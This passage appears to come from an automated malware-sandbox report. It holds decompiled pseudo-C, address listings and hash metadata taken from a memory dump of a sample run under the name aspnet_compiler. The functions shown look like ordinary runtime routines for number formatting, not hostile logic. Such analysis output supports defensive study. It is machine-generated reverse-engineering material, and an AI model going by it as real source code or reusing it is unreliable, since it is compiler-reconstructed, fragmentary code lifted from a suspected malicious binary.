							 *((char*)(_t220 + 0x216)) =  *((intOrPtr*)(_t304 + 0x5c));
							return _t290;
						}
					} else {
						goto L14;
					}
				}
			}





























                0x0041c46d
                0x0041c46d
                0x0041c46f
                0x0041c471
                0x0041c476
                0x0041c863
                0x00000000
                0x0041c484
                0x0041c488
                0x0041c48c
                0x0041c496
                0x0041c49a
                0x0041c49c
                0x0041c49c
                0x0041c4a6
                0x0041c4ad
                0x0041c86b
                0x0041c4b3
                0x0041c4b3
                0x0041c4bd
                0x0041c4c1
                0x0041c4cf
                0x0041c4d9
                0x0041c4e5
                0x0041c4ee
                0x0041c4f7
                0x0041c516
                0x0041c51b
                0x0041c538
                0x0041c53b
                0x0041c545
                0x0041c56c
                0x0041c56f
                0x0041c58e
                0x0041c591
                0x0041c5b0
                0x0041c5b3
                0x0041c5d1
                0x0041c5d4
                0x0041c5f9
                0x0041c607
                0x0041c612
                0x0041c61d
                0x0041c636
                0x0041c63e
                0x0041c659
                0x0041c65c
                0x0041c678
                0x0041c67b
                0x0041c699
                0x0041c69c
                0x0041c6bb
                0x0041c6be
                0x0041c6dd
                0x0041c6e0
                0x0041c6f9
                0x0041c719
                0x0041c71c
                0x0041c739
                0x0041c73c
                0x0041c758
                0x0041c75d
                0x0041c764
                0x0041c77d
                0x0041c787
                0x0041c790
                0x0041c799
                0x0041c7a2
                0x0041c7ab
                0x0041c7b4
                0x0041c7bd
                0x0041c7c6
                0x0041c7d7
                0x0041c7ec
                0x0041c7f5
                0x0041c7fe
                0x0041c806
                0x0041c808
                0x0041c80d
                0x0041c823
                0x0041c82d
                0x0041c80f
                0x0041c814
                0x0041c815
                0x0041c815
                0x0041c838
                0x0041c841
                0x0041c841
                0x0041c838
                0x0041c848
                0x0041c851
                0x0041c85a
                0x00000000
                0x0041c860
                0x00000000
                0x00000000
                0x00000000
                0x0041c48c

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c5db9ca4f1c5b09496bc3937c001735d70be4d77db350b6a7890b20243b6fb1c
                • Instruction ID: 7e825ff0f363f43f5b3a8908b9af69e6ff7e98779d5c53e4bf8ebeb1fa6b92c6
                • Opcode Fuzzy Hash: c5db9ca4f1c5b09496bc3937c001735d70be4d77db350b6a7890b20243b6fb1c
                • Instruction Fuzzy Hash: A5B183395142998ACB05EF68C4913F63BA1EF6A301F4850B9EC9CCF757D3398506EB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043CE28 Relevance: .2, Instructions: 237COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 83%
                			E0043CE28(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x46f00c; // 0xd60a1515
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0043D85A(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E004338BB(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E0043B40A(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0043DEE5(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E0043B40A(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E0043DCB0(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E0043B40A(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E0043D5F2(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E0043D7CF(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E0043D358(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0043D73C(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E0043D7B0(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E0043D19B(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0043D55A(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































                0x0043ce28
                0x0043ce30
                0x0043ce37
                0x0043ce3c
                0x0043ce3e
                0x0043ce42
                0x0043ce45
                0x0043ce49
                0x0043ce4a
                0x0043ce4d
                0x0043ceba
                0x0043cebd
                0x0043cf0c
                0x0043cf0c
                0x0043cf0f
                0x0043ce7b
                0x0043ce7d
                0x0043ce82
                0x0043ce84
                0x0043cf2a
                0x0043cf2d
                0x0043d073
                0x0043d075
                0x0043d084
                0x0043d084
                0x0043cf33
                0x0043cf38
                0x0043cf3b
                0x0043cf3e
                0x0043cf42
                0x0043cf48
                0x0043cf49
                0x0043cf4b
                0x0043cf75
                0x0043cf75
                0x0043cf79
                0x0043cf7c
                0x0043cf86
                0x0043cf88
                0x0043cf8b
                0x0043cf8d
                0x0043cf93
                0x0043cf93
                0x0043cf95
                0x0043cf95
                0x0043cf98
                0x0043cfa6
                0x0043cfa6
                0x0043cfa8
                0x0043cfaa
                0x0043cfab
                0x0043cfad
                0x0043cfb3
                0x0043cfb5
                0x0043cfb6
                0x0043cfbb
                0x0043cfbe
                0x0043cfcc
                0x0043cfcc
                0x0043cfce
                0x0043cfce
                0x0043cfd9
                0x0043cfdb
                0x0043cfe0
                0x0043cfe0
                0x0043cfe3
                0x0043cfe9
                0x0043cfeb
                0x0043cfee
                0x0043cffe
                0x0043d003
                0x0043d003
                0x0043d018
                0x0043d01d
                0x0043d020
                0x0043d025
                0x0043d028
                0x0043d02a
                0x0043d02c
                0x0043d02f
                0x0043d032
                0x0043d03f
                0x0043d044
                0x0043d044
                0x0043d032
                0x0043d04b
                0x0043d050
                0x0043d053
                0x0043d058
                0x0043d05b
                0x0043d05d
                0x0043d06a
                0x0043d06f
                0x0043d05d
                0x00000000
                0x0043d072
                0x0043cfc2
                0x0043cfc3
                0x0043cfc6
                0x00000000
                0x00000000
                0x0043cfc8
                0x00000000
                0x0043cfc8
                0x0043cfaf
                0x0043cfb1
                0x00000000
                0x00000000
                0x00000000
                0x0043cfb1
                0x0043cf9c
                0x0043cf9d
                0x0043cfa0
                0x00000000
                0x00000000
                0x0043cfa2
                0x00000000
                0x0043cfa2
                0x00000000
                0x0043cf8f
                0x0043cf80
                0x0043cf81
                0x0043cf84
                0x00000000
                0x00000000
                0x00000000
                0x0043cf84
                0x0043cf4f
                0x0043cf52
                0x0043cf54
                0x0043cf5f
                0x0043cf61
                0x0043cf69
                0x0043cf6b
                0x0043cf6d
                0x00000000
                0x00000000
                0x0043cf6f
                0x0043cf73
                0x0043cf73
                0x00000000
                0x0043cf73
                0x0043cf63
                0x0043cf58
                0x0043cf58
                0x0043cf59
                0x00000000
                0x0043cf59
                0x0043cf56
                0x00000000
                0x0043cf56
                0x0043ce8a
                0x00000000
                0x0043ce8a
                0x0043cf16
                0x0043cf16
                0x0043cf19
                0x0043ceeb
                0x0043ceeb
                0x0043ceec
                0x0043ceee
                0x0043cef0
                0x00000000
                0x0043cef0
                0x0043cf1b
                0x0043cf1e
                0x00000000
                0x00000000
                0x0043cf24
                0x0043ce93
                0x0043ce93
                0x00000000
                0x0043ce93
                0x0043cebf
                0x0043cf02
                0x00000000
                0x0043cf02
                0x0043cec1
                0x0043cec4
                0x0043cef7
                0x0043cef9
                0x00000000
                0x0043cef9
                0x0043cec6
                0x0043cec9
                0x0043cee7
                0x0043cee7
                0x0043cee7
                0x0043cee7
                0x00000000
                0x0043cee7
                0x0043cecb
                0x0043cece
                0x0043cee0
                0x00000000
                0x0043cee0
                0x0043ced0
                0x0043ced3
                0x00000000
                0x00000000
                0x0043ced7
                0x00000000
                0x0043ced7
                0x0043ce4f
                0x00000000
                0x00000000
                0x0043ce55
                0x0043ce57
                0x0043ce97
                0x0043ce97
                0x0043ce9a
                0x0043ceb3
                0x00000000
                0x0043ceb3
                0x0043ce9c
                0x0043ce9c
                0x0043ce9f
                0x00000000
                0x00000000
                0x0043cea2
                0x0043cea5
                0x00000000
                0x00000000
                0x0043cea7
                0x0043ceaa
                0x00000000
                0x0043ceaa
                0x0043ce59
                0x0043ce91
                0x00000000
                0x0043ce91
                0x0043ce5d
                0x00000000
                0x00000000
                0x0043ce66
                0x00000000
                0x00000000
                0x0043ce6b
                0x00000000
                0x00000000
                0x0043ce70
                0x00000000
                0x00000000
                0x0043ce79
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c304fa1241f2167d175a72178ec03e6d31472f49922fbde597fc92f990b6398b
                • Instruction ID: 3669a4fafa20d8c219774ebe753aac7cf543434df3b4a1aec9738dd85a4d98ed
                • Opcode Fuzzy Hash: c304fa1241f2167d175a72178ec03e6d31472f49922fbde597fc92f990b6398b
                • Instruction Fuzzy Hash: 4C614371A0070866DA385A2898C6BBF7396EB0DB48F14351BE842FB3C1C65DAD46875E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C76D Relevance: .2, Instructions: 214COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 88%
                			E0043C76D(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E0043D7E7(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0043B381(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E0043DD3B(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0043B381(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E0043DAD7(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0043B381(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0043D5F2(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E0043D7CF(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0043D1FE(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0043D73C(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E0043D7B0(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E0043D138(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0043D4CA(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                0x0043c772
                0x0043c775
                0x0043c779
                0x0043c77c
                0x0043c780
                0x0043c783
                0x0043c7f1
                0x0043c7f4
                0x0043c843
                0x0043c843
                0x0043c846
                0x0043c7b3
                0x0043c7b5
                0x0043c7ba
                0x0043c7bc
                0x0043c861
                0x0043c865
                0x0043c86e
                0x0043c873
                0x0043c874
                0x0043c878
                0x0043c87a
                0x0043c87f
                0x0043c882
                0x0043c884
                0x0043c8ad
                0x0043c8ad
                0x0043c8b0
                0x0043c8b3
                0x0043c8ba
                0x0043c8bc
                0x0043c8bf
                0x0043c8c1
                0x0043c8c5
                0x0043c8c5
                0x0043c8c8
                0x0043c8d3
                0x0043c8d3
                0x0043c8d5
                0x0043c8d5
                0x0043c8d7
                0x0043c8dd
                0x0043c8dd
                0x0043c8e2
                0x0043c8e5
                0x0043c8f0
                0x0043c8f0
                0x0043c8f2
                0x0043c8f2
                0x0043c8fd
                0x0043c901
                0x0043c901
                0x0043c904
                0x0043c90a
                0x0043c90c
                0x0043c90f
                0x0043c91f
                0x0043c924
                0x0043c924
                0x0043c939
                0x0043c93e
                0x0043c941
                0x0043c946
                0x0043c949
                0x0043c94b
                0x0043c94d
                0x0043c950
                0x0043c953
                0x0043c960
                0x0043c965
                0x0043c965
                0x0043c953
                0x0043c96c
                0x0043c971
                0x0043c974
                0x0043c979
                0x0043c97c
                0x0043c97e
                0x0043c98b
                0x0043c990
                0x0043c97e
                0x0043c993
                0x0043c996
                0x0043c99b
                0x0043c99b
                0x0043c8e7
                0x0043c8ea
                0x00000000
                0x00000000
                0x0043c8ec
                0x00000000
                0x0043c8ec
                0x0043c8d9
                0x0043c8db
                0x00000000
                0x00000000
                0x00000000
                0x0043c8db
                0x0043c8ca
                0x0043c8cd
                0x00000000
                0x00000000
                0x0043c8cf
                0x00000000
                0x0043c8cf
                0x0043c8c3
                0x0043c8c3
                0x0043c8c3
                0x00000000
                0x0043c8c3
                0x0043c8b5
                0x0043c8b8
                0x00000000
                0x00000000
                0x00000000
                0x0043c8b8
                0x0043c888
                0x0043c88b
                0x0043c88d
                0x0043c895
                0x0043c897
                0x0043c8a1
                0x0043c8a3
                0x0043c8a5
                0x00000000
                0x00000000
                0x0043c8a7
                0x0043c8ab
                0x0043c8ab
                0x00000000
                0x0043c8ab
                0x0043c899
                0x00000000
                0x0043c899
                0x0043c88f
                0x00000000
                0x0043c88f
                0x0043c867
                0x00000000
                0x0043c867
                0x0043c7c2
                0x0043c7c2
                0x00000000
                0x0043c7c2
                0x0043c84d
                0x0043c84d
                0x0043c850
                0x0043c822
                0x0043c822
                0x0043c823
                0x0043c825
                0x0043c827
                0x00000000
                0x0043c827
                0x0043c852
                0x0043c855
                0x00000000
                0x00000000
                0x0043c85b
                0x0043c7ca
                0x0043c7ca
                0x00000000
                0x0043c7ca
                0x0043c7f6
                0x0043c839
                0x00000000
                0x0043c839
                0x0043c7f8
                0x0043c7fb
                0x0043c82e
                0x0043c830
                0x00000000
                0x0043c830
                0x0043c7fd
                0x0043c800
                0x0043c81e
                0x0043c81e
                0x0043c81e
                0x0043c81e
                0x00000000
                0x0043c81e
                0x0043c802
                0x0043c805
                0x0043c817
                0x00000000
                0x0043c817
                0x0043c807
                0x0043c80a
                0x00000000
                0x00000000
                0x0043c80e
                0x00000000
                0x0043c80e
                0x0043c785
                0x00000000
                0x00000000
                0x0043c78b
                0x0043c78e
                0x0043c7ce
                0x0043c7ce
                0x0043c7d1
                0x0043c7ea
                0x00000000
                0x0043c7ea
                0x0043c7d3
                0x0043c7d3
                0x0043c7d6
                0x00000000
                0x00000000
                0x0043c7d9
                0x0043c7dc
                0x00000000
                0x00000000
                0x0043c7de
                0x0043c7e1
                0x00000000
                0x0043c7e1
                0x0043c790
                0x0043c7c9
                0x00000000
                0x0043c7c9
                0x0043c795
                0x00000000
                0x00000000
                0x0043c79e
                0x00000000
                0x00000000
                0x0043c7a3
                0x00000000
                0x00000000
                0x0043c7a8
                0x00000000
                0x00000000
                0x0043c7b1
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                • Instruction ID: 30287a3694dd43d94ab10e3d1e96423d83f960c2cd3ce907925d9f31734030c6
                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                • Instruction Fuzzy Hash: 8B514671A00A0697DB3C692884D97BF27969F0D705F18781BD882F7382C71CEE06975E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C99C Relevance: .2, Instructions: 214COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 88%
                			E0043C99C(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E0043D7E7(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0043B3DE(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E0043DE52(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0043B3DE(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E0043DB7E(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0043B3DE(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
